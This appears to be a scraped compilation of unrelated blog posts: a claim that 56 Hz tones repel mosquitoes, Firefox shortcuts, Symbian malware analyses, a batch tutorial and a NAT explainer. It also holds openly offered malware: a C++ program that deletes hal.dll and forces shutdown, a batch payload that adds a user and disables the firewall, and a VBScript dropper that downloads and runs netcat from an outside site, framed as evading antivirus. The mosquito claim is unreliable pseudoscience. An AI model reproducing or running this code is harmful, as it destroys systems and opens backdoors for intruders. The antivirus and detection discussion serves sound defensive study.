Stop using chemical-based insecticides to kill mosquitoes, because you might kill yourself.
Download this anti-mosquito software to repel those annoying insects and be safer and greener.
How does it work?
Dragonflies are the mortal enemy of mosquitoes, and in flight they generate sound frequencies of (approximately) between 67 Hz and 45 Hz, depending on their size.
56 Hz is a good average between those frequencies. Your PC sound card and speakers will work well for this purpose. There are many sound and tone generator programs available on the internet for both the Mac and Windows PC. Set up your computer with the sound/tone generator program running and then play the sound through your computer speakers. The speakers can be aimed directionally for complete room coverage.
The sound level on the speakers should be adjusted so it is barely audible. This arrangement can be set up in a bedroom where you would like to have the window open but are worried about mosquitoes. One speaker should be fairly close to where you are sleeping.
Here are some links to more advanced tone generator software which can actually sweep between the 45 Hz and 67 Hz frequencies:
http://www.nch.com.au/tonegen/index.htm
http://www.esseraudiosolutions.com/ttg.
KILL MOSQUITOES WITH YOUR COMPUTER
Shortcut Keys For Firefox!
Windows Keyboard Shortcuts for Mozilla Firefox
CTRL + A Select all text on a webpage
CTRL + B Open the Bookmarks sidebar
CTRL + C Copy the selected text to the Windows clipboard
CTRL + D Bookmark the current webpage
CTRL + F Find text within the current webpage
CTRL + G Find more text within the same webpage
CTRL + H Opens the webpage History sidebar
CTRL + I Open the Bookmarks sidebar
CTRL + J Opens the Download Dialogue Box
CTRL + K Places the cursor in the Web Search box ready to type your search
CTRL + L Places the cursor into the URL box ready to type a website address
CTRL + M Opens your mail program (if you have one) to create a new email message
CTRL + N Opens a new Firefox window
CTRL + O Open a local file
CTRL + P Print the current webpage
CTRL + R Reloads the current webpage
CTRL + S Save the current webpage on your PC
CTRL + T Opens a new Firefox Tab
CTRL + U View the page source of the current webpage
CTRL + V Paste the contents of the Windows clipboard
CTRL + W Closes the current Firefox Tab or Window (if more than one tab is open)
CTRL + X Cut the selected text
CTRL + Z Undo the last action
Windows Keyboard Shortcuts for Mozilla Firefox
F1 Opens Firefox help
F3 Find more text within the same webpage
F5 Reload the current webpage
F6 Toggles the cursor between the address/URL input box and the current webpage
F7 Toggles Caret Browsing on and off. Used to be able to select text on a webpage with the keyboard.
F11 Switch to Full Screen mode
SYMBIAN VIRUSES......
PHONE BOOK STEALER
Description:
This mobile virus is interesting in that it steals the user's phonebook data, compiles it into a text file and sends it over Bluetooth without user confirmation.
So far, this is the first Symbian virus I've seen that steals user data and sends it to other Bluetooth-capable devices without user confirmation.
Analysis/Observation:
This trojan is distributed as an application file and is spreading as pbexplorer.SIS.
Symptoms:
When the user tries to install this suspicious *.SIS file, the installer looks like the screenshot below, taken during the installation process:
http://img369.imageshack.us/img369/9507/8f209da05hb.jpg
After installation completes, the application is set to run automatically and displays the following text:
________________
| Phone Book |
| Compacting |
| by: lajel 202u |
| |
| please wait... |
|________________|
________________________
| Compacting |
| your contact(s),step 2 |
| |
| Please wait again |
| until done... |
|________________________|
After the malicious process is done, it pops up a message:
"Done!!!"
If the user presses [OK], the malicious program ends itself and, after some time, starts searching for Bluetooth devices and sends all phonebook information in a text file via Bluetooth.
Prevention:
This malware requires that the user intentionally install it on the device. As always, users should never install third-party applications from unknown sites.
SYMBIAN TROJAN--Mabtal.A....
Profimail v2.75_FULL.SIS/SymbOS Mabtal.A is a SIS-file malware that pretends to be a cracked version of Profimail, a very popular third-party e-mail application on the Symbian platform. In fact, it is malware that drops Mabir.A, Caribe and Fontal variants into the phone system. It also drops some corrupted binary files, which cause the phone to restart automatically and show a fatal error message. After that, the phone permanently fails to boot.
Positive analysis results:
When tested on the above handsets, both platforms were affected. When the user tries to install the suspicious file on the phone, it looks like the image below:
user posted image
While the suspicious file is being installed, it shows the message below:
http://img268.imageshack.us/img268/2144/317e79031ih.th.jpg
The suspicious file automatically installs all of its files into the phone memory. The Cabir virus starts spreading via Bluetooth and keeps listening for incoming messages; when any SMS/MMS message arrives on the phone, the Mabir.A virus immediately sends itself out via MMS in order to spread.
When the user tries to open the Profimail and ProfiExplorer third-party applications, an error message like the one below may be displayed:
http://img268.imageshack.us/img268/7508/76ff985d6zw.th.jpg
Once the device has restarted, the corrupted fonts leave it permanently unable to boot.
Using the hash-number-matching method, the following files were proved to be malware while analysis is still in progress:
11x12 euro_fonts.gdr detected as SymbOS.Fontal.A
CARIBE0.APP detected as SymbOS.Mabir.A
CARIBE0.RSC detected as SymbOS.Cabir
flo0.mdl detected as SymbOS.Mabir.A
flo.mdl detected as SymbOS.Mabir.A
caribe.app detected as SymbOS.Mabir.A
caribe.rsc detected as SymbOS.Cabir
Appinst.app detected as SymbOS.Cabir.U2
Appinst.aif detected as SymbOS.Cabir.U2
This malware doesn't come with any valid digital certificate, but it can replicate itself via Bluetooth or MMS (Mabir.A), and it will cause severe damage to Symbian OS 6.1 handsets!
SplinterCell-ChaosTheory_S60_cracked-XiMPDA.SIS OR SymbOS/Skudoo.A..
This is a Series 60 trojan that installs the Skulls trojan, MGDropper, Commwarrior, Doomboot.A and Cabir onto the targeted device. When the trojan is executed, most applications on the phone are replaced with non-functional or corrupted files, so they can no longer run as usual. It fails to attack the NOKIA 6680 once the phone has been restarted. Even so, McAfee AVERT mentioned that this trojan will cause the phone to fail to reboot on the next restart by the user.
It is also the first mobile trojan in the world that is capable of propagating the MGDropper virus and the Commwarrior virus vice-versa.
It also contains the image shown below, which I found when I extracted the *.SIS file:
http://i21.photobucket.com/albums/b261/McAfee88/aa.gif
Some of the blank icons that the trojan drops are actually coded to restart the phone automatically; once the phone has restarted, its menu no longer functions, which locks the whole phone completely.
When the user tries to install the trojan on the phone, the symptoms are as shown below:
http://i21.photobucket.com/albums/b261/McAfee88/P1010045.jpg
While the suspicious file is being installed on the phone, it pops up the message shown below:
http://i21.photobucket.com/albums/b261/McAfee88/ccb3703e.jpg
powerful c++ virus
This is a powerful C++ virus that I have made, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.
Warning: Do not try this on your home computer.
The Original Code:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
A more advanced version of this virus, which makes the C:\\Windows\\ a variable that cannot be wrong, was made by getores. Here it is:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
The second version would be more useful during times when you do not know the victim's default drive. It might be drive N: for all you know.
Batch Programming Basics
A tutorial by Nikhil on the basics of batch file programming. It explains what batch file programming is and how to create batch files.
The Basics of Batch File Programming
Batch file programming is nothing but a batch of DOS (Disk Operating System) commands, hence the name Batch. If you code a lot and know many languages, you are sure to notice that operating system (OS) specific languages (languages that work only on a particular operating system, e.g. Visual Basic Scripting works only in Windows) give you amazing control over the system. This is why Batch is so powerful: it gives you absolute control over DOS. Batch isn't recommended at all because it is OS specific, but it is fun and easy to learn. This tutorial will teach you not only batch file programming but also how to fend for yourself and learn more commands that tutorials don't teach you.
The first command you should know is ECHO. All ECHO does is simply print something onto the screen. It's like "printf" in C or "PRINT" in Basic. Anyway, this is how we use it.
ECHO Hello World!
All right, now save the above line as a .bat file and double-click it. This should be the output -
C:\WINDOWS\Desktop>ECHO Hello World!
Hello World!
Hmmm, notice that it shows the command before executing it. But we're coders, right? We don't want our code to look so untidy, so just add an @ sign before ECHO and execute it. Woohoo! Much better. The @ sign tells DOS to hide from the user whatever commands it is executing. Now, what if I want to write to a file? This is how I do it -
@ECHO Hello World > hello.txt
Simple, huh? Remember, ">" creates or overwrites a file and ">>" appends to (writes at the end of) a file that already exists. Guess why this program won't work as desired -
@ECHO Hello World > hello.txt
@ECHO Hello World Again > hello.txt
Looking at it, you will see that the program is supposed to write two lines one after another, but it won't work: the first line creates a file called hello.txt and writes the words "Hello World" to it, and the second line just overwrites the earlier text. So what it actually does is create a file, write to it, and then overwrite what it had written earlier. To change this we just add a ">". The additional ">" will make DOS append to the file. So here's the improved form of the program -
@ECHO Hello World > hello.txt
@ECHO Hello World Again >> hello.txt
Save the above code as a .bat file and execute it; it will work without a hitch. The next thing we should learn is the GOTO statement. GOTO is just the same as it is in BASIC or, for that matter, any programming language; the only difference is in the labels.
This is a label in C or BASIC - label:
This is a label in batch - :label
In C or BASIC, the ":" comes after the label and in Batch it comes before the label. Bear this in mind as you proceed. Here's an example of the GOTO statement -
:labelone
@ECHO LoL
GOTO labelone
If you execute this code, you will see that it is an unlimited loop; it will keep printing to the screen till the end of time if you don't interrupt it :) The GOTO statement is very useful when it comes to building big Batch programs. Now, we will learn the IF and EXIST commands. The IF command is usually used for checking if a file exists, like this -
@IF EXIST C:\WINDOWS\EXPLORER.EXE ECHO It exists
Observe that I have not used inverted commas ( " ) as I would in BASIC or C. The EXIST command is only found in Batch and not in any other language. The EXIST command can also be used to check if a file does not exist, like this -
@IF NOT EXIST C:\WINDOWS\EXPLORER.EXE ECHO It does not exist
Remember, Batch is not a language like C or BASIC or Pascal; it cannot do mathematical functions. In Batch, all you can do is control DOS. In the above example, notice that there is no THEN command as there would be in most languages.
Sick and tired of using the @ sign before each and every command? Let's do some research: go to the DOS prompt, type in ECHO /? and press Enter. Interesting. In this way, when you hear of a new DOS command you don't know about, just type in "command /?" and you can get help on it. Now back to ECHO. From the help we received by typing in ECHO /?, you must have concluded that if you type in ECHO OFF you no longer need to type an @ sign before every command.
Wait! Just add an @ before ECHO OFF so that it does not display the message - ECHO is off.
The next command we are going to learn about is the CLS command. It stands for CLear Screen. If you know BASIC, you will have no problem understanding this command. All it does is clear the screen. Here's an example -
@ECHO OFF
CLS
ECHO This is DOS
This command needs no further explanation, but type in CLS /? to get more help on the command.
The next command we are going to learn is CD. It stands for Current Directory. It displays the current directory you are in if you just type in "CD", but if you type in "CD C:\Windows\Desktop" it will take you to the Desktop. Here's an example -
@ECHO OFF
CD C:\Windows\Desktop
ECHO Testing.. > test.txt
ECHO Testing...>>test.txt
This will change the directory to the Desktop and create a file there called test.txt and write to it. If we had not used the CD command, this is how the program would have looked.
@ECHO OFF
ECHO Testing.. > C:\Windows\Desktop\test.txt
ECHO Testing...>> C:\Windows\Desktop\test.txt
See the difference? Anyway, that's all for The Basics of Batch File Programming. Remember, each and every DOS command can be used in Batch.
How does IP mapping for data transmission over networks work?
You probably know what TCP/IP is: any computer using TCP/IP has a unique IP address by which data, in the form of packets, is sent to and received from other computers. The process of passing data packets from one computer to another by analysing the "routing tables" to reach the destination is known as routing.
A routing table is a database of defined rules that determines the best path for data packets as they travel towards their destination IP address. Routing is performed by a device called a router.
But the IP addresses used for internal or private networks are not registered; they are referred to as local IP addresses. These addresses are used for data transmission within the LAN and are not visible on the internet. For data transmission from the internal network to the internet, the local IP address is translated to a registered global IP address by Network Address Translation (NAT).
NAT provides security by hiding internal IP addresses, enables the use of more IP addresses without the possibility of IP address conflicts, and makes multiple ISDN (Integrated Services Digital Network) connections appear as a single internet connection. This provides a first line of defence, but because NAT only translates IP addresses, a firewall is usually used in conjunction with a NAT router for security against incoming data packets from the internet. The firewall could be software or hardware.
In Some Detail: NAT
NAT is a standard that enables the use of separate sets of IP addresses for internal and external traffic. When connecting to the internet, local IP addresses are translated to global IP addresses on a one-to-one basis (one internal address to one global address) or a many-to-one basis (a group of internal addresses to one global address). NAT can be used by a computer, a router, or a firewall.
NAT has several forms, such as static, dynamic, overloading and overlapping. Static NAT translates any unregistered local IP address on a one-to-one basis to a registered global IP address. The Internet Assigned Numbers Authority (IANA) has reserved three blocks of the IP address space for private networks:
10.0.0.0-10.255.255.255 (24-bit block)
172.16.0.0-172.31.255.255 (20-bit block)
192.168.0.0-192.168.255.255 (16-bit block)
Any enterprise can use such IP addresses, and these will be unique within that enterprise. When the enterprise needs to connect to the net, it needs to get a unique global/public IP address from the internet registry. That public address will never be assigned from the three blocks reserved for private networks.
As an example, 192.168.21.14 will be translated to 212.15.48.105 and used for external traffic. Dynamic NAT translates any local unregistered IP address to a registered global IP address from a group or range of global IP addresses. For example, 192.168.21.14 will be translated to any of the global IP addresses ranging from 212.15.148.105 to 212.15.148.120.
In the case of overloading, each IP address on the private network is translated to a registered IP address, but with a different port number. The internal IP might be in use by any other network.
In some cases, the internal IP range might be a registered range in use by another network. Here NAT translates addresses to avoid potential conflicts. This is called overlapping. It can be done by using static NAT or by using DNS or dynamic NAT.
Firewalls are intrusion protection systems that prevent packets from unsecured, unknown or unauthorised locations from coming in. Firewalls can be software or hardware. We have a good number of tutorials about firewalls, but still.... A NAT router offers a packet-filtering firewall (a hardware firewall). These examine the source IP address and port to determine whether the packet is to be accepted or dropped.
Hardware Firewall
On a hardware firewall, user-created or predefined rules about packets to be blocked from specific TCP/IP ports are configured. The firewall uses packet filtering: it examines the header of each incoming packet to determine its source and destination, and then decides whether to accept the packet or exclude it.
With a hardware firewall only incoming traffic is restricted, not outgoing traffic. So a malicious program such as a keylogger, which has already entered the network and is concealed as a safe program, can still send information to its destination.
Also, at times, routing through the router is blocked, and peer-to-peer activity on the network is not possible if the private network uses a NAT-enabled router.
There is a debate about whether NAT will be necessary, whether it will provide better security, etc. when IPv6 is implemented. The debate goes on............
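The overloading form of NAT and the incoming-only filtering described above, as a small simulation (an added example, not code from the original post). The remote hosts 198.51.100.7 and 203.0.113.9, the starting public port 40000 and the optional allowed_dports egress rule are assumptions made for illustration; the egress rule goes one step beyond the text to show how the outgoing gap can be closed.

```python
"""NAT overloading (port translation) with stateful inbound filtering.

Added illustration: addresses other than 192.168.21.14 and 212.15.48.105
are constructed sample values (documentation ranges).
"""
import ipaddress
from dataclasses import dataclass, field
from typing import Optional

# The three IANA private blocks listed in the text, in CIDR form.
PRIVATE_BLOCKS = [ipaddress.ip_network(n)
                  for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_private(addr: str) -> bool:
    """True if addr falls inside one of the three private blocks."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in PRIVATE_BLOCKS)


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int


@dataclass
class NatRouter:
    public_ip: str
    # Assumption: optional egress rule, not part of the original text.
    allowed_dports: Optional[frozenset] = None
    next_port: int = 40000  # constructed start of the public port range
    # (private ip, private port, remote ip, remote port) -> public port
    out_map: dict = field(default_factory=dict)
    # (public port, remote ip, remote port) -> (private ip, private port)
    in_map: dict = field(default_factory=dict)

    def outbound(self, pkt: Packet) -> Optional[Packet]:
        """Translate a LAN packet; returns None only if egress rules drop it."""
        if not is_private(pkt.src):
            raise ValueError("outbound source must be a private address")
        if self.allowed_dports is not None and pkt.dport not in self.allowed_dports:
            return None  # dropped by the egress rule
        key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        if key not in self.out_map:
            # Overloading: one public IP, a fresh public port per flow.
            port = self.next_port
            self.next_port += 1
            self.out_map[key] = port
            self.in_map[(port, pkt.dst, pkt.dport)] = (pkt.src, pkt.sport)
        return Packet(self.public_ip, self.out_map[key], pkt.dst, pkt.dport)

    def inbound(self, pkt: Packet) -> Optional[Packet]:
        """Forward only replies that match an existing outbound flow."""
        if pkt.dst != self.public_ip:
            return None
        target = self.in_map.get((pkt.dport, pkt.src, pkt.sport))
        if target is None:
            return None  # unsolicited: no mapping, so the packet is dropped
        return Packet(pkt.src, pkt.sport, target[0], target[1])


def demo():
    router = NatRouter(public_ip="212.15.48.105")
    # Two LAN hosts use the same source port; NAT keeps them apart by port.
    a = router.outbound(Packet("192.168.21.14", 5000, "198.51.100.7", 443))
    b = router.outbound(Packet("192.168.21.15", 5000, "198.51.100.7", 443))
    # The server's reply to host A is translated back to the private address.
    reply = router.inbound(Packet("198.51.100.7", 443, router.public_ip, a.sport))
    # A different remote host probing the same public port is dropped.
    unsolicited = router.inbound(Packet("203.0.113.9", 4444, router.public_ip, a.sport))
    # Outgoing traffic from an already-compromised host is translated like
    # any other flow: incoming-only filtering does not stop it.
    exfil = router.outbound(Packet("192.168.21.14", 5001, "203.0.113.9", 8080))
    # With an egress rule (web ports only) the same flow is dropped.
    strict = NatRouter(public_ip="212.15.48.105", allowed_dports=frozenset({80, 443}))
    blocked = strict.outbound(Packet("192.168.21.14", 5001, "203.0.113.9", 8080))
    return a, b, reply, unsolicited, exfil, blocked


if __name__ == "__main__":
    for label, result in zip(
            ("host A out", "host B out", "reply in", "unsolicited in",
             "exfil out", "exfil out (egress rule)"), demo()):
        print(f"{label:24} {result}")
```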
A routing table is a database of defined rules that determines the best path for data packets as they go towards their destination IP address.The process of routing is performed by a device called router.
But the IP addresses used for internal or private networks r not registered;they r reffered to as local IP addresses.These addresses are used for data transmission within the LAN,and r not visible on the internet.For data transmission from the internal network to the internet,the local IP address is registered as global IP address by Network Access Translation (NAT).
NAT provides security by hiding internal IP addresses,enables the use of more IP addresses without the possibility of IP address conflicts , and multiple ISDN(Integrated Services Digital Network) connections aooear as a single internet connections.This provides a first line of defence,but because NAT only translates IP addresses,a firewall is ususlly used in conjuction with a NAT router with security against incoming security data packets from the internet.The firewall could b software or hardware.
In some detail: NAT
NAT is a standard that enables the use of separate sets of IP addresses for internal and external traffic. When connecting to the internet, local IP addresses are translated to global IP addresses on a one-to-one (one internal address to one global address) or many-to-one (a group of internal addresses to one global address) basis. NAT can be performed by a computer, a router, or a firewall.
NAT has several forms, such as static, dynamic, overloading and overlapping. Static NAT translates any unregistered local IP address on a one-to-one basis to a registered global IP address. The Internet Assigned Numbers Authority (IANA) has reserved three blocks of the IP address space for private networks:
10.0.0.0-10.255.255.255 (24-bit block)
172.16.0.0-172.31.255.255 (20-bit block)
192.168.0.0-192.168.255.255 (16-bit block)
Any enterprise can use these IP addresses, and they will be unique within that enterprise. When the enterprise needs to connect to the internet, it needs to get a unique global/public IP address from the internet registry. That public address will never be assigned from the three blocks reserved for private networks.
As an example of static NAT, 192.168.21.14 will be translated as 212.15.48.105 and used for external traffic. Dynamic NAT translates any local unregistered IP address to a registered global IP address from a group or range of global IP addresses. For example, 192.168.21.14 will be translated to any of the global IP addresses ranging from 212.15.148.105 to 212.15.148.120.
In the case of overloading, each IP address on the private network is translated to a registered IP address, but with a different port number. The internal IP might be in use by any other network.
In some cases, the internal IP range might be a registered range in use by another network. Here NAT translates addresses to avoid potential conflicts. This is called overlapping. It can be done by using static NAT or by using DNS or dynamic NAT.
Firewalls are intrusion protection systems that prevent packets from unsecured, unknown or unauthorised locations from coming in. Firewalls can be software or hardware. We have a good number of tutorials about firewalls, but still... A NAT router offers a packet-filtering firewall (hardware firewall). It examines the source IP address and port to determine whether the packet is to be accepted or dropped.
Hardware Firewall
On a hardware firewall, user-created or predefined rules about packets to be blocked from specific TCP/IP ports are configured. The firewall uses packet filtering: it examines the header of each incoming packet to determine its source and destination, and then decides whether to accept the packet or drop it.
With a hardware firewall only incoming traffic is restricted, and not outgoing traffic. So a malicious program such as a keylogger, which has already entered the network and is concealed as a safe program, can send information to its destination.
Also, at times, routing through the router is blocked, and peer-to-peer activity on the network is not possible if the private network uses a NAT-enabled router.
There is a debate about whether NAT will be necessary, whether it will provide better security, etc. when IPv6 is implemented. The debate goes on...
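The translation and filtering behaviour described above, as an added example that is not part of the original post: a toy model of NAT overloading using the article's own sample addresses. The class name, the port pool and the remote endpoints are assumptions made for illustration.

```python
import ipaddress

# The three IANA-reserved private blocks listed in the article.
PRIVATE_BLOCKS = [ipaddress.ip_network(n) for n in
                  ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_private(addr):
    """True if addr falls inside one of the three private blocks."""
    ip = ipaddress.ip_address(addr)
    return any(ip in block for block in PRIVATE_BLOCKS)


class OverloadNat:
    """Toy model of NAT overloading: many local hosts share one global IP."""

    def __init__(self, global_ip, first_port=40000):
        if is_private(global_ip):
            raise ValueError("global address must not come from a private block")
        self.global_ip = global_ip
        self.next_port = first_port   # constructed port pool (assumption)
        self.out = {}                 # (local_ip, local_port) -> global_port
        self.back = {}                # (global_port, remote) -> (local_ip, local_port)

    def outbound(self, local_ip, local_port, remote):
        """Translate a packet leaving the LAN; the sender's intent is never inspected."""
        if not is_private(local_ip):
            raise ValueError("source is not a local address")
        key = (local_ip, local_port)
        if key not in self.out:
            self.out[key] = self.next_port
            self.next_port += 1
        gport = self.out[key]
        self.back[(gport, remote)] = key
        return (self.global_ip, gport, remote)

    def inbound(self, remote, global_port):
        """Return the local endpoint for a reply, or None if the packet is dropped."""
        return self.back.get((global_port, remote))


if __name__ == "__main__":
    nat = OverloadNat("212.15.48.105")
    web = ("198.51.100.7", 80)        # constructed remote endpoint
    print(nat.outbound("192.168.21.14", 5000, web))
    print(nat.inbound(web, 40000))                    # reply to an open mapping
    print(nat.inbound(("203.0.113.9", 4444), 40000))  # unsolicited: None
```

Any program inside the LAN can open a mapping and receive replies through it, which is the outgoing-traffic gap the article describes. An unsolicited inbound packet finds no mapping and is dropped, which is also why peer-to-peer connections fail behind such a router.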
How to create a new undetectable virus in 3 easy steps
This article will demonstrate how an average PC user can create a piece of malicious software in minutes that will be undetected by all the major anti-malware scanning engines.
This article is for informational purposes only and the author disclaims any responsibility for your use or misuse of any of the information contained herein.
It is well-known in blackhat circles that a new piece of malware, coded from scratch, will almost always bypass signature-based malware scanners. What is less known is that the skill needed to do this is minimal at best - an average user with no programming experience can cut and paste a few lines of code together and create an undetected malicious executable in 3 easy steps.
Most anti-virus scanners rely on a database of signatures for known viruses. Once a new virus is spread wide enough that it has been identified as malicious, the anti-virus vendors scramble to come up with a fingerprint to identify that strain of malware in the future. The obvious flaw in this process is that a new piece of malware will bypass the scanners by default, until it is widespread enough to be noticed by security researchers or picked up by a dummy node. There is always a window of opportunity for new malware between the time of deployment and the update of the signature databases and as recent malware trends demonstrate, this window is large enough to make a profit for the authors.
Roll-your-own undetected malware in 3 easy steps!
Step 1: Commands to execute
Here we compile the DOS commands that our malware will execute into a DOS batch file. As a simple proof of concept, let’s add a new user, disable the XP firewall, and create a directory on the C drive.
@echo off
net user hacksafe hacksafe /add
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
mkdir c:\haxed
Save the above as a filename.bat
Step 2: Compile to an executable
Experienced DOS users may remember a number of utilities that were able to convert a batch file into an executable (com or exe). These tools basically wrap a shell call around each of our commands and bundle the whole thing up into a tiny .exe file. One of the most well known is BAT2EXEC released by PC Magazine in 1990.
[Screenshot: creating our malware]
Our tiny executable COM file is ready to go.
Step 3: Test and Deploy
We now have a custom executable that runs some obviously malicious commands: disabling the firewall and adding a new user. If we were to email this file to a target, surely any modern anti-virus scanner would pick this up as a simple batch file and alert us to the malicious code… right?
[Screenshots: virus scan 1, virus scan 2, virus scan 3]
No patterns exist for this new piece of malware - it’s unrecognised by signature-based scanners. Heuristics and sandboxing may alert to suspicious activity, or email filtering may prevent our executable from reaching the target, but the primary mechanism of anti-malware protection has been defeated in a matter of seconds with little knowledge or skill on the part of the attacker. If the target user were to run our executable, the only indication of malicious activity would be a command prompt quickly appearing and disappearing on the desktop.
Step 4 (Optional):
A typical malware author would take the created executable and mangle it in various ways to make it harder to detect - using tools such as encrypters, packers, scramblers and EXE binders. The malicious code may be bundled with a legitimate executable, or packed with a rootkit or other remote access utility. For more information on how malware authors avoid detection, check out our article on packers and scramblers.
Example: Creating a simple dropper
A dropper is a small piece of malware designed to “drop” another piece of malware onto a system. It usually comes in the form of a simple executable that, when executed, retrieves a file from a hardcoded web or FTP site and executes it (usually a rootkit or botnet suite).
As a proof of concept, we can create a simple dropper using VBscript in a batch file that pulls down a copy of netcat from the Hacksafe site and executes it:
echo Dim DataBin >hacksafe.vbs
echo Dim HTTPGET >>hacksafe.vbs
echo Set HTTPGET = CreateObject(”Microsoft.XMLHTTP”) >>hacksafe.vbs
echo HTTPGET.Open “GET”, “http://www.hacksafe.com.au/nc.exe“, False>>hacksafe.vbs
echo HTTPGET.Send >>hacksafe.vbs
echo DataBin = HTTPGET.ResponseBody >>hacksafe.vbs
echo Const adTypeBinary=1 >>hacksafe.vbs
echo Const adSaveCreateOverWrite=2 >>hacksafe.vbs
echo Dim test1 >>hacksafe.vbs
echo Set test1 = CreateObject(”ADODB.Stream”) >>hacksafe.vbs
echo test1.Type = adTypeBinary >>hacksafe.vbs
echo test1.Open >>hacksafe.vbs
echo test1.Write DataBin >>hacksafe.vbs
echo test1.SaveToFile “malware.exe”, adSaveCreateOverWrite >>hacksafe.vbs
hacksafe.vbs
malware.exe -h
We compile using one of the many bat conversion utilities - Bat-to-Exe Converter 1.1. (This utility packs the output file using UPX, which may cause some anti-virus scanners to flag the file as potentially suspicious).
[Screenshot: bat2exe dropper]
After creating our simple dropper.exe we submit it for scan:
[Screenshot: dropper scanned for malware]
Nothing found. It would be trivial to include the firewall disable command from the previous example and configure a netcat command line to listen on an incoming port and spawn a command shell. A new, undetected yet incredibly simple and obvious, remote access trojan!
It is hoped that this article serves to demonstrate the fundamental flaw of signature-based malware detection systems.
Some additional points to consider:
* A .COM file under 64kb can be renamed to an .EXE (or .scr, or .lnk, etc) and will still execute.
* Heuristics and behaviour analysis may detect malicious activity.
* The examples above assume XP sp2 and the user has local admin privileges.
* Many bat2exe utilities use a packer or scrambler that is recognised by signatures.
* Anyone with programming experience can see that the above can be achieved using execve(), system().
* This is old, old news. People were hacking BBS’s using BAT2EXE in the early 90’s!
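The point above about heuristics and behaviour analysis, as an added example that is not part of the original article: a file-hash signature lookup beside rules that match what the child processes do, run over constructed process-creation events for the Step 1 commands. The rule names, the parent image paths, the threshold and the `wscsvc` service-name alternative are assumptions made for illustration.

```python
import hashlib
import re

# Constructed signature database: hashes of samples catalogued earlier.
KNOWN_BAD_SHA256 = {hashlib.sha256(b"previously catalogued sample").hexdigest()}

# Behaviour rules for the actions in Step 1, matched on each child
# process's command line rather than on the file that launched it.
RULES = {
    "local_account_created": re.compile(
        r'\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b', re.I),
    "security_service_stopped": re.compile(
        r'\bnet1?(\.exe)?\s+stop\s+"?(security center|wscsvc|sharedaccess)"?', re.I),
    "firewall_disabled": re.compile(
        r'\bnetsh(\.exe)?\s+firewall\s+set\s+opmode\s+(mode=)?disable', re.I),
}


def signature_hit(file_bytes):
    """Classic signature check: only matches files that were seen before."""
    return hashlib.sha256(file_bytes).hexdigest() in KNOWN_BAD_SHA256


def behaviour_hits(events):
    """Group rule matches by parent image; events are (parent, command_line)."""
    hits = {}
    for parent, cmdline in events:
        for name, rx in RULES.items():
            if rx.search(cmdline):
                hits.setdefault(parent, set()).add(name)
    return hits


def verdict(events, threshold=2):
    """Flag parents whose children trip at least `threshold` distinct rules."""
    return sorted(p for p, names in behaviour_hits(events).items()
                  if len(names) >= threshold)


# Constructed process-creation events: (parent image, child command line).
SAMPLE_EVENTS = [
    ("C:\\Temp\\invoice.com", "net user hacksafe hacksafe /add"),
    ("C:\\Temp\\invoice.com", 'net stop "Security Center"'),
    ("C:\\Temp\\invoice.com", "net stop SharedAccess"),
    ("C:\\Temp\\invoice.com", "netsh firewall set opmode mode=disable"),
    ("C:\\Temp\\invoice.com", "cmd /c mkdir c:\\haxed"),
    ("C:\\Windows\\explorer.exe", "net use Z: \\\\fileserver\\share"),
    ("C:\\Tools\\admin.exe", "net stop Spooler"),
]

if __name__ == "__main__":
    print(signature_hit(b"constructed bytes of a never-seen wrapper"))  # False
    print(verdict(SAMPLE_EVENTS))
```

Renaming or re-wrapping the file changes its hash but not the command lines its children run, so the behaviour rules still fire while the signature lookup stays silent.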
Batch to EXE Convertors
BAT2EXE - http://www.computerhope.com/dutil.htm
Batch2EXE Convertor - http://www.softpedia.com/get/System/File-Management/Batch-To-Exe-Converter.shtml
Bat2COM - http://www.techpronow.com/modules/mydownloads/singlefile.php?cid=2&lid=15
ExeScript - http://www.surfpack.com/downloads/ExeScript/21361.html
Online Virus Scanning
VirusTotal - http://www.virustotal.com/
Jotti’s Malware Scan - http://virusscan.jotti.org/
Kaspersky - http://www.kaspersky.com/scanforvirus
Thanks for reading! We welcome your feedback and comments!
(And no, we will not help you with your new 0day worm or virus, so please don’t ask!)